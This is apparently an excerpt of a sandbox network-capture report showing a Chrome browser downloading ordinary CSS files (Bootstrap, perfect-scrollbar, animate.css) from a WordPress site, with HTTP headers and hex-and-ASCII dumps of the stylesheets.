                                                                                                          2024-12-12 11:58:09 UTC629OUTGET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/css/bootstrap.min.css?ver=4.3.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:10 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:09 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:31 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 155758
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d
                                                                                                          Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610f2;--
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 6f 6c 2d 78 6c 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 78 6c 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 78 6c 2d 66 69 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 78 6c 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 78 6c 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e
                                                                                                          Data Ascii: ol-xl-11{-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-xl-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-xl-first{-ms-flex-order:-1;order:-1}.order-xl-last{-ms-flex-order:13;order:13}.order-xl-0{-ms-flex-order:0;order:0}.
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 6d 2d 63 68 65 63 6b 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 7e 2e 69 6e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 2e 77 61
                                                                                                          Data Ascii: m-check-input:invalid~.invalid-tooltip{display:block}.custom-control-input.is-invalid~.custom-control-label,.was-validated .custom-control-input:invalid~.custom-control-label{color:#dc3545}.custom-control-input.is-invalid~.custom-control-label::before,.wa
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 65 7d 7d 2e 64 72 6f 70 64 6f 77 6e 2c 2e 64 72 6f 70 6c 65 66 74 2c 2e 64 72 6f 70 72 69 67 68 74 2c 2e 64 72 6f 70 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 35 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2e 32 35 35 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 2e 33 65 6d 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 2e 33 65 6d 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64
                                                                                                          Data Ascii: e}}.dropdown,.dropleft,.dropright,.dropup{position:relative}.dropdown-toggle{white-space:nowrap}.dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid;border-right:.3em solid transparent;bord
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 63 6f 6c 6f 72 3a 23 34 39 35 30 35 37 3b 63 6f 6e 74 65 6e 74 3a 22 42 72 6f 77 73 65 22 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 63 65 66 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 2e 32 35 72 65 6d 20 2e 32 35 72 65 6d 20 30 7d 2e 63 75 73 74 6f 6d 2d 72 61 6e 67 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 31 72 65 6d 20 2b 20 2e 34 72 65 6d 29 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61
                                                                                                          Data Ascii: 5rem;line-height:1.5;color:#495057;content:"Browse";background-color:#e9ecef;border-left:inherit;border-radius:0 .25rem .25rem 0}.custom-range{width:100%;height:calc(1rem + .4rem);padding:0;background-color:transparent;-webkit-appearance:none;-moz-appeara
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 3a 31 2e 32 35 3b 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 7d 2e 70 61 67 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 7a 2d 69 6e 64 65 78 3a 32 3b 63 6f 6c 6f 72 3a 23 30 30 35 36 62 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 63 65 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 65 65 32 65 36 7d 2e 70 61 67 65 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 7a 2d 69 6e 64 65 78 3a 32 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d
                                                                                                          Data Ascii: :1.25;color:#007bff;background-color:#fff;border:1px solid #dee2e6}.page-link:hover{z-index:2;color:#0056b3;text-decoration:none;background-color:#e9ecef;border-color:#dee2e6}.page-link:focus{z-index:2;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 33 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 33 72 65 6d 7d 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 3e 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 63 68 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 72 65 6d 7d 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 3e 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 7d 2e 6d 6f 64 61 6c 2d 73 63 72 6f 6c 6c 62 61 72 2d 6d 65 61 73 75 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 39 70 78 3b 77 69 64 74 68 3a 35 30 70 78 3b 68 65 69 67 68 74 3a 35 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 73 63 72 6f 6c 6c 7d 40 6d
                                                                                                          Data Ascii: tom-right-radius:.3rem;border-bottom-left-radius:.3rem}.modal-footer>:not(:first-child){margin-left:.25rem}.modal-footer>:not(:last-child){margin-right:.25rem}.modal-scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}@m
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 6c 65 2d 63 65 6c 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 2d 70 72 69 6e 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 2d 70 72 69 6e 74 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 65 6d 62 65 64 2d 72 65 73 70 6f 6e 73 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68
                                                                                                          Data Ascii: le-cell!important}.d-print-flex{display:-ms-flexbox!important;display:flex!important}.d-print-inline-flex{display:-ms-inline-flexbox!important;display:inline-flex!important}}.embed-responsive{position:relative;display:block;width:100%;padding:0;overflow:h
                                                                                                          2024-12-12 11:58:10 UTC16384INData Raw: 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 69 78 65 64 2d 74 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 30 7d 2e 66 69 78 65 64 2d 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 30 7d 40 73 75 70 70 6f 72 74 73 20 28 28 70 6f 73 69 74 69 6f 6e 3a 2d 77 65 62 6b 69 74 2d 73 74 69 63 6b 79 29 20 6f 72 20 28 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 29 29 7b 2e 73 74 69 63 6b 79 2d 74 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 2d 77 65 62 6b 69 74 2d 73 74 69 63 6b 79 3b 70 6f 73 69 74 69 6f 6e
                                                                                                          Data Ascii: position:sticky!important}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}@supports ((position:-webkit-sticky) or (position:sticky)){.sticky-top{position:-webkit-sticky;position
                                                                                                          2024-12-12 11:58:10 UTC8302INData Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 6c 67 2d 6e 34 2c 2e 6d 78 2d 6c 67 2d 6e 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6c 67 2d 6e 35 7b 6d 61 72 67 69 6e 3a 2d 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6c 67 2d 6e 35 2c 2e 6d 79 2d 6c 67 2d 6e 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 6c 67 2d 6e 35 2c 2e 6d 78 2d 6c 67 2d 6e 35 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6c 67 2d 6e 35 2c 2e 6d 79 2d 6c 67 2d 6e 35 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 33 72 65 6d 21 69 6d 70 6f 72 74
                                                                                                          Data Ascii: argin-bottom:-1.5rem!important}.ml-lg-n4,.mx-lg-n4{margin-left:-1.5rem!important}.m-lg-n5{margin:-3rem!important}.mt-lg-n5,.my-lg-n5{margin-top:-3rem!important}.mr-lg-n5,.mx-lg-n5{margin-right:-3rem!important}.mb-lg-n5,.my-lg-n5{margin-bottom:-3rem!import


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.2449802147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:10 UTC624OUTGET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.css?ver=1.5.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:10 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:10 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2598
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:10 UTC2598INData Raw: 2f 2a 0a 20 2a 20 43 6f 6e 74 61 69 6e 65 72 20 73 74 79 6c 65 0a 20 2a 2f 0a 2e 70 73 20 7b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 2d 61 6e 63 68 6f 72 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0a 20 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 61 75 74 6f 3b 0a 20 20 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 61 75 74 6f 3b 0a 7d 0a 0a 2f 2a 0a 20 2a 20 53 63 72 6f 6c 6c 62 61 72 20 72 61 69 6c 20 73 74 79 6c 65 73 0a 20 2a 2f 0a 2e 70 73 5f 5f 72 61 69 6c 2d 78 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f
                                                                                                          Data Ascii: /* * Container style */.ps { overflow: hidden !important; overflow-anchor: none; -ms-overflow-style: none; touch-action: auto; -ms-touch-action: auto;}/* * Scrollbar rail styles */.ps__rail-x { display: none; opacity: 0; transitio


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.2449803147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:10 UTC656OUTGET /wp-content/plugins/enjoy-instagram-instagram-responsive-images-gallery-and-carousel/assets/css/animate.min.css?ver=6.2.2 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:11 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:10 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:03:27 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 54732
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 61 6e 69 6d 61 74 65 64 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 62 6f 74 68 3b 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 62 6f 74 68 7d 2e 61 6e 69 6d 61 74 65 64 2e 69 6e 66 69 6e 69 74 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 69 6e 66 69 6e 69 74 65 7d 2e 61 6e 69 6d 61 74 65 64 2e 68 69 6e 67 65 7b 2d 77 65 62 6b
                                                                                                          Data Ascii: @charset "UTF-8";.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webk
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 52 69 67 68 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 30 70 78 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 30 70 78 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29
                                                                                                          Data Ascii: it-transform:translateX(0);transform:translateX(0)}}@keyframes fadeInRight{0%{opacity:0;-webkit-transform:translateX(20px);-ms-transform:translateX(20px);transform:translateX(20px)}100%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0)
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 74 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 49 6e 44 6f 77 6e 52 69 67 68 74 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 2d 77 65 62 6b 69
                                                                                                          Data Ascii: t}@-webkit-keyframes rotateInDownRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(90deg);transform:rotate(90deg);opacity:0}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webki
                                                                                                          2024-12-12 11:58:11 UTC5580INData Raw: 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 32 30 30 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 31 29 20 74 72 61 6e 73 6c 61 74 65 58 28 32 30 30 30 70 78 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 36 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 34 37 35 29 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 34 38 70 78 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 34 37 35 29 20
                                                                                                          Data Ascii: ;-ms-transform:scale(.1) translateX(2000px);transform:scale(.1) translateX(2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(-48px);-ms-transform:scale(.475)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.2449805147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:10 UTC599OUTGET /wp-content/plugins/woocommerce/assets/css/select2.css?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:11 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:11 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 14615
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
